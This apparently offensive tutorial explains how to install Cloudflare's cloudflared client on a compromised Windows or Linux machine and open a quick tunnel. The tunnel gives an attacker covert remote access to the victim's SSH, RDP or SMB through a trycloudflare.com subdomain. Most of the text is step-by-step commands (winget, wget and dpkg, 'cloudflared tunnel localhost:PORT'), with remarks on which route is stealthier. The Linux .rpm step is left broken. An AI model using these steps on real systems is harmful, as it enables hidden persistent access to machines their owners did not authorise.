CloudFlare Tunnels, a widely used feature in the CloudFlare arsenal, empowers users to establish secure outbound connections to the CloudFlare network for their web servers or applications.

The process is streamlined—you can set up a tunnel with ease by installing the cloudflared client, available for Linux, Windows, macOS, and Docker platforms.

Once configured, the service becomes accessible on the internet via a user-defined hostname, catering to legitimate scenarios like resource sharing and testing. You can set this tunnel up to stealthy connect to the victims SSH, RDP, and SMB servers.

With just one command from the victim's device, revealing nothing more than the attacker's distinctive tunnel token, a discrete communication channel can be effortlessly established. Simultaneously, you can gain the ability to dynamically adjust a tunnel's configuration, toggling its status between disabled and enabled in real-time as per their requirements.

How to setup and use TryCloudFlare tunnels


Windows

  1. Download and install cloudflared on the compromised Windows machine via winget:
    winget install --id Cloudflare.cloudflared
    
  2. Rename download to cloudflared.exe . OPTIONAL: Move cloudflared.exe to where you want it to sit.
  3. Open up Powershell and navigate to where cloudflared.exe is before running the following command. Replace PORT with the port you want to tunnel to:
    cloudflared.exe tunnel localhost:PORT
    

Linux

  1. You will need to download the appropriate .deb (Debian, Ubuntu, Mint) or .rpm (RHEL, Fedora, CentOS) files to the compromised machine beblow:

    Installing cloudflared with .deb:

    wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb dpkg -i cloudflared-linux-amd64.deb 
    

    Installing cloudflared with .rpm:

    wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-x86_64.rpm
    ```bash
    
  2. Once completed you can create a tunnel by using the following command. Replace PORT with the port you want to tunnel to:

    cloudflared tunnel localhost:PORT
    

Accessing The Tunnel

After executing cloudflared it will generate a random subdomain on trycloudflare.com that points to the compromised machine and its selected PORT. You can now use the selected application (ssh, smb, rdp) that corresponds with the port to connect to your new subdomain.

If you're having trouble with getting TryCloudFlare to work then it might be best to setup a CloudFlare account and obtain a domain name. You can then go into CloudFlare's "Zero Trust" section and start assigning the tunnels. There is more flexibility in doing it this way, however it is less stealthy and a few more steps since you will need to get a domain name and assign it.